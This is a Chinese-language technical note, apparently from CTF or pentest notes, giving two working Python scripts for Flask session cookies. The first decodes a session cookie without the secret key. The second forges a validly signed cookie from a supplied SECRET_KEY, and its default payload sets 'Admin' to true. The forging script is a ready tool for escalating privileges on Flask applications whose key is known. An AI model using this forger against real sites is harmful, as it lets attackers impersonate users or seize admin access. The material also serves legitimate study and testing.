Session 解密与签名伪造
Flask 默认的 session 是 client-side session：整个 session 内容以 itsdangerous **签名**（而不是加密）的形式存放在客户端 cookie 里。因此任何拿到 cookie 的人都可以在不知道 SECRET_KEY 的情况下直接解码、读取其中内容（下面的解密脚本不校验签名，解出来的数据不应当作可信数据）；但要伪造一个服务端会接受的 session，必须拿到应用的 SECRET_KEY 并用与服务端一致的 salt / 摘要算法重新签名。
session 解密（无需 SECRET_KEY）
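#!/usr/bin/env python3
"""Decode a Flask session cookie -- no SECRET_KEY needed.

Flask's default session is client-side: the whole session dict lives in
the ``session`` cookie, signed by itsdangerous but NOT encrypted, so
anyone holding the cookie can read it.  This script only decodes; it
deliberately skips the signature, so the result is untrusted data
(the key is needed only to *forge* a cookie the server will accept).
"""
import json
import sys
import zlib
from base64 import b64decode, urlsafe_b64decode  # noqa: F401 (b64decode kept from original)

try:
    # Flask's tagged serializer restores values plain JSON cannot carry
    # (tuples, bytes, datetimes, UUIDs, Markup).
    from flask.sessions import session_json_serializer
except ImportError:
    # Flask absent: fall back to plain JSON; tagged values come back as
    # their raw ``{" t": [...]}``-style dicts instead of being untagged.
    session_json_serializer = None


def _urlsafe_b64decode(data: bytes) -> bytes:
    """URL-safe base64 decode, re-adding the ``=`` padding itsdangerous strips."""
    return urlsafe_b64decode(data + b'=' * (-len(data) % 4))


def decryption(payload):
    """Return the session object stored in a Flask session cookie value.

    Args:
        payload: the cookie value as ``bytes`` or ``str``, laid out as
            ``[.]<base64 body>.<base64 timestamp>.<base64 signature>``;
            a leading ``.`` means the body is zlib-compressed.

    Returns:
        The deserialized session payload (normally a ``dict``).

    Raises:
        ValueError: malformed layout, invalid base64, bad zlib stream or
            invalid JSON (``binascii.Error`` already subclasses ValueError;
            ``zlib.error`` is wrapped).

    The timestamp and signature are split off and ignored: nothing here
    proves the cookie was issued by the server.
    """
    if isinstance(payload, str):
        payload = payload.encode('ascii')  # cookie values are ASCII; non-ASCII is corrupt input
    # Same cut as two rsplit(b'.', 1): last two dots separate timestamp and signature.
    parts = payload.rsplit(b'.', 2)
    if len(parts) != 3:
        raise ValueError('Not a Flask session cookie: expected <body>.<timestamp>.<signature>')
    body, _timestamp, _signature = parts

    compressed = body.startswith(b'.')
    if compressed:
        body = body[1:]

    try:
        body = _urlsafe_b64decode(body)
    except ValueError as e:  # binascii.Error is a ValueError
        raise ValueError('Could not base64 decode the payload') from e

    if compressed:
        try:
            body = zlib.decompress(body)
        except zlib.error as e:
            raise ValueError('Could not zlib decompress the payload') from e

    if session_json_serializer is not None:
        return session_json_serializer.loads(body)
    return json.loads(body)


if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.exit(f'usage: {sys.argv[0]} <session-cookie-value>')
    print(decryption(sys.argv[1]))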
Session 伪造（需要 SECRET_KEY）
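#!/usr/bin/env python3
"""Forge (re-sign) a Flask session cookie -- this DOES need the app's SECRET_KEY.

Reading a Flask session needs no secret; producing one the server will
accept does, because the cookie is HMAC-signed with SECRET_KEY.  The
signer below mirrors Flask's default ``SecureCookieSessionInterface``:
salt ``cookie-session``, ``hmac`` key derivation and a **sha1** digest.
The original listing used sha512; Flask's default interface signs with
sha1, so such a cookie is rejected as a bad signature.  An app that
subclasses the session interface may change any of these -- pass the
matching ``salt`` / ``digest_method`` in that case.
"""
import base64  # noqa: F401 (kept from original listing)
import json
import sys
import zlib  # noqa: F401 (kept from original listing)
from hashlib import sha1, sha512  # noqa: F401 (sha512 kept for non-default targets)

from flask.sessions import session_json_serializer
from itsdangerous import URLSafeTimedSerializer, BadTimeSignature  # noqa: F401

PAYLOAD = {'Admin': True}


def forge(payload, secret_key, *, salt='cookie-session', digest_method=sha1):
    """Return a freshly signed session cookie value for *payload*.

    Args:
        payload: session contents, normally a JSON-serializable dict.
        secret_key: the target app's ``SECRET_KEY`` (str or bytes).
        salt: itsdangerous salt; Flask's default is ``'cookie-session'``.
        digest_method: hash constructor used for key derivation and the
            HMAC; Flask's default session interface uses ``sha1``.

    Returns:
        ``str`` cookie value ``<body>.<timestamp>.<signature>``.  The
        timestamp is "now", so the cookie is inside whatever max-age the
        server enforces (Flask: PERMANENT_SESSION_LIFETIME, 31 days by default).
    """
    signer = URLSafeTimedSerializer(
        secret_key,
        salt=salt,
        serializer=session_json_serializer,
        signer_kwargs={'key_derivation': 'hmac', 'digest_method': digest_method},
    )
    return signer.dumps(payload)


if __name__ == '__main__':
    # usage: forge.py [SECRET_KEY [JSON payload]]; defaults match the original demo
    # (placeholder key 'secret-key', PAYLOAD) -- replace the key with the real one.
    secret = sys.argv[1] if len(sys.argv) > 1 else 'secret-key'
    payload = json.loads(sys.argv[2]) if len(sys.argv) > 2 else PAYLOAD
    print(forge(payload, secret))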